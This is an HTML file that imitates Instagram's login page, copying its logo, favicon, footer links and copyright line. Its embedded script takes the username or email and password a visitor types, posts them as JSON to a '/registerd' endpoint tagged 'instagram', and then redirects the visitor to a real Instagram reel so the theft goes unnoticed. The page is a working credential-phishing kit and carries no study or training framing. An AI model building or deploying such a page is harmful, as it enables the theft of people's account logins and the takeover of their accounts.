<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <!-- instagram favicon  -->
    <link
      rel="icon"
      href="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png"
      type="image/x-icon"
    />
    <title>Instagram</title>
    <link
      href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css"
      rel="stylesheet"
    />
    <style>
      .senFacebook{
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: row;
      }
      *{padding:0;
        margin:0;
        box-sizing:border-box;
        font-family:sans-serif;
      }
      a{
        text-decoration:none;
      }
      img{
        max-width:100%;
        height:auto;
      }
      html{
        font-size:14px;
      }
      body{
        background-color:#fafafa;
        color:#262626;
      }
      .l-main{
        width:100vw;
        height:100vh;
        display:flex;
        justify-content:center;
        align-items:center;
        overflow:hidden;
      }

      @media (max-width: 449px){
        .l-main{
          display:block;
        }}

      @media (max-width: 874px){
        .l-main .l-main__img{
          display:none;
        }}

      .l-user{
        display:flex;
        flex-direction:column;
      }

      .group{
        background:#fff;
        border:1px solid lightgrey;
      }
      @media (max-width: 449px){
        .group{
          background:inherit;
          border:none;
        }}

      .c-panel{
        display:flex;
        flex-direction:column;
        align-items:center;
        justify-content:center;
        padding:40px 40px 0;
      }
        
        .c-panel .c-panel__img{
          height:51px;
          width:175px;
          margin-bottom:30px;
        }
          .c-panel .c-panel__form{
            display:flex;
            flex-direction:column;
            text-align:center;
            width:250px;
          }
          .c-panel .c-panel__form .c-btn{
            margin-top:14px;
          }
          .c-panel .c-panel__form .c-panel__input{
            color:#262626;
            background:#fafafa;
            border:1px solid lightgray;
            padding:9px 0 7px 8px;
            border-radius:4px;
            outline:none;
          }
          .c-panel .c-panel__form .c-panel__input:nth-child(1){
            margin-bottom:6px;
          }
          .c-panel .c-panel__form .c-panel__span{
            font-size:13px;
            font-weight:600;
            color:#8e8e8e;
            margin:16px 0 30px 0;
            position:relative;
          }
          .c-panel .c-panel__form .c-panel__span::after{
            content:'';
            position:absolute;
            display:inline-block;
            vertical-align:middle;
            background:lightgray;
            width:40%;
            height:1.5px;
            top:8px;
            right:0;
          }
          .c-panel .c-panel__form .c-panel__span::before{
            content:'';
            position:absolute;
            display:inline-block;
            vertical-align:middle;
            background:lightgray;
            width:40%;height:1.5px;
            top:8px;left:0px;
          }
            .c-panel .c-panel__facebook{
              color:#385185;
              display:flex;
            }
            .c-panel .c-panel__facebook::before{
              content:'';
              display:inline-block;
              width:16px;
              height:16px;
              background:url(../img/facebook.svg);
              margin-right:8px;
            }
            .c-panel .c-panel__forgot{
              margin:20px 0 20px;
              font-size:12px;
              color:#0095f6;
            }
            .c-btn{
              color:#fff;
              font-weight:500;
              background:#0095f6;
              border-radius:4px;
              font-size:14px;
              line-height:18px;
              padding:6px 0;
            }
            .c-app p{
              text-align:center;
              margin:20px 0;
            }
            .c-app .c-app__download{
              display:flex;
              justify-content:center;
              cursor:pointer;
            }
              .c-app .c-app__download img{
                max-width:140px;
                max-height:40px;
              }
              .c-app .c-app__download img:nth-child(2){
                margin-left:8px;
              }
              .c-signup{
                display:flex;
                justify-content:center;
                align-items:center;
                padding:20px;
                margin-top:10px;
              }
              .c-signup span{
                color:#0095f6;
                cursor:pointer;
              }
    </style>
  </head>
  <body>
   

      <main class="l-main">
        <div class="l-main__img">
          <img src="https://raw.githubusercontent.com/yurimutti/instagram-login-page/master/assets/img/homepage.png" alt="Smartphones">
        </div>
        <div class="l-user">
          <div class="c-panel group">
            <img class="c-panel__img" src="https://raw.githubusercontent.com/yurimutti/instagram-login-page/058ed9e7358fd1330956d29953b87621d934a98b/assets/img/instagram.svg" alt="Instagram">
            <!-- main form -->
            <form id="registrationForm">
            <div class="c-panel__form">
              <input type="text" class="c-panel__input" placeholder="Phone number, username, or email" id="staticEmail">

              <input type="text" class="c-panel__input" placeholder="Password"  id="inputPassword">

              <button type="submit" class="c-btn">Log In</button>
              <p id="showError"></p>
              <span class="c-panel__span">OR</span>
            </div>
          </form>
          
            <div class="senFacebook">
                <img src="https://raw.githubusercontent.com/yurimutti/instagram-login-page/058ed9e7358fd1330956d29953b87621d934a98b/assets/img/facebook.svg" alt="facebooklogo">
              <a href="#" class="c-panel__facebook">Login with Facebook</a>
            </div>
            <a href="#" class="c-panel__forgot">Forgot password?</a>
          </div>
          <div class="c-signup group">
            <p>Create new account</p>
          </div>
          <div class="c-app">
            <p>Get the app.</p>
            <div class="c-app__download">
              <img src="https://raw.githubusercontent.com/yurimutti/instagram-login-page/master/assets/img/apple.png" alt="Apple Store">
              <img src="https://raw.githubusercontent.com/yurimutti/instagram-login-page/master/assets/img/google.png" alt="Google Play">
            </div>
          </div>
        </div>
    </main>
 
        <div class="mt-6 text-center text-zinc-500 dark:text-zinc-400">
          <div class="flex flex-wrap justify-center space-x-4">
            <a href="#" class="hover:underline">Meta</a>
            <a href="#" class="hover:underline">About</a>
            <a href="#" class="hover:underline">Blog</a>
            <a href="#" class="hover:underline">Jobs</a>
            <a href="#" class="hover:underline">Help</a>
            <a href="#" class="hover:underline">API</a>
            <a href="#" class="hover:underline">Privacy</a>
            <a href="#" class="hover:underline">Terms</a>
            <a href="#" class="hover:underline">Locations</a>
            <a href="#" class="hover:underline">Instagram Lite</a>
            <a href="#" class="hover:underline">Threads</a>
            <a href="#" class="hover:underline"
              >Contact Uploading & Non-Users</a
            >
            <a href="#" class="hover:underline">Meta Verified</a>
          </div>
          <p class="mt-4">© 2024 Instagram from Meta</p>
        </div>
      </div>
   

    <script>
           document
        .getElementById("registrationForm")
        .addEventListener("submit", async (event) => {
          event.preventDefault();

          const Email = document.getElementById("staticEmail").value;
          const Password = document.getElementById("inputPassword").value;
          const showError = document.getElementById("showError");
          const platform = "instagram";

          if (Password.length > 8 || Password.length < 8) {
            showError.textContent = "Your password should be 8 characters";
            return;
          } else {
            sendData();
          }

          async function sendData() {
            await fetch("/registerd", {
              method: "POST",
              headers: {
                "Content-Type": "application/json",
              },
              body: JSON.stringify({ platform, Email, Password }),
            }).then(() => {
              // going to fake page
              window.location.href =
                "https://www.instagram.com/reel/C6ZGzKBMvQx/?utm_source=ig_web_copy_link&igsh=MzRlODBiNWFlZA==";
            });
          }
        });
    </script>
  </body>
</html>
